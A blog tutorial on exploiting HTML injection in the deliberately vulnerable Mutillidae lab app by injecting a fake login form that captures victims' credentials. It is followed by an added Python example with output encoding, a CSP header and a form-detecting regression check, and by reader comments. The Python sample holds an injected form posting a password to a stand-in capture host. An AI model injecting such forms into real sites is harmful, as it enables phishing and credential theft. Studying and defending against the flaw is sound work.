HTML Injection

26 Jun

HTML injection is a vulnerability in web applications that allows users to insert HTML code through an entry point such as a specific parameter. This type of attack can be combined with social engineering to trick valid users of the application into opening malicious websites, or into entering their credentials in a fake login form that redirects them to a page that captures cookies and credentials. In this tutorial we are going to see how we can exploit this vulnerability effectively once it is discovered. For the purposes of this article, Mutillidae will be used as the vulnerable application.

Let’s say we have a page like the following:


Vulnerable Form



Of course, in this example there is an indication that the form accepts HTML tags, as this is part of the application's functionality. A malicious attacker will reason that he can exploit the users of this application if he sets up a page on his own server that captures their cookies and credentials. With such a page in place, he can trick users into entering their credentials by injecting a fake HTML login form into the vulnerable page. Mutillidae already has a data capture page, so we are going to use that page for our tutorial.

Mutillidae - Data Capture Page



Now we can inject HTML code that will cause the application to load a fake login form.

Injecting HTML Code - Fake Login



The next image shows the fake login form:

Fake Login Form



Every user who enters his credentials will be redirected to another page where the credentials are stored. In this case the credentials can be found on the data capture page, and we can see them below:





As we saw in this article, HTML injection vulnerabilities are very easy to exploit and can have a large impact, as any user of the web application can be a target. System admins must take appropriate measures for their web applications in order to prevent these types of attacks.
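To make the "appropriate measures" concrete, here is an added example (not from the original article and not Mutillidae's code) that renders the same user-supplied entry with and without output encoding, then parses the result to check whether a browser would still see an injected form. The function names, the sample entry and the placeholder host `capture.invalid` are constructed for illustration; the `form-action` CSP directive is shown as a second layer of defence.

```python
import html
from html.parser import HTMLParser

# Constructed sample: a user-submitted entry carrying markup for a login
# form that posts to another host (placeholder domain, not a real one).
SAMPLE_ENTRY = (
    'Session expired, please log in again:'
    '<form action="https://capture.invalid/c"><input name="password"></form>'
)

# Defence in depth: even if markup slips through, the browser only lets
# forms submit back to the application's own origin.
CSP_HEADER = ("Content-Security-Policy", "form-action 'self'")


def render_vulnerable(entry: str) -> str:
    """The flaw: user text is concatenated into the page as-is."""
    return "<div class='entry'>" + entry + "</div>"


def render_hardened(entry: str) -> str:
    """The fix: HTML-encode user text at output time (&, <, >, quotes)."""
    return "<div class='entry'>" + html.escape(entry, quote=True) + "</div>"


class FormFinder(HTMLParser):
    """Collects the action target of every <form> element in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action"))


def form_actions(page: str) -> list:
    """Return the action of each form found when the page is parsed."""
    finder = FormFinder()
    finder.feed(page)
    finder.close()
    return finder.actions


if __name__ == "__main__":
    print("vulnerable:", form_actions(render_vulnerable(SAMPLE_ENTRY)))
    print("hardened:  ", form_actions(render_hardened(SAMPLE_ENTRY)))
    print("header:    ", ": ".join(CSP_HEADER))
```

The same parser check can be run in a regression test against any page that echoes user input, so a template change that drops the encoding is caught before release.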


Posted by on June 26, 2013 in Web Application



5 responses to “HTML Injection”

  1. c

    June 26, 2013 at 5:01 pm

    Thanks for your article, a question: The data captured is stored in a file in the same server or can be transferred to another server??


  2. netbiosX

    June 26, 2013 at 10:57 pm

    The data capture page is stored on the web server that you control.

  3. GuiRaimbault

    July 20, 2013 at 6:29 am

    Hi! Thanks for your article but the use of Mutillidae (a learning platform, done to be vulnerable as much as possible) makes this article low level. The same thing on a real website would be better.
    Nevertheless, your example is good 🙂

  4. 7n47!5

    March 15, 2014 at 5:18 pm

    Nice one (y) and very nice this site

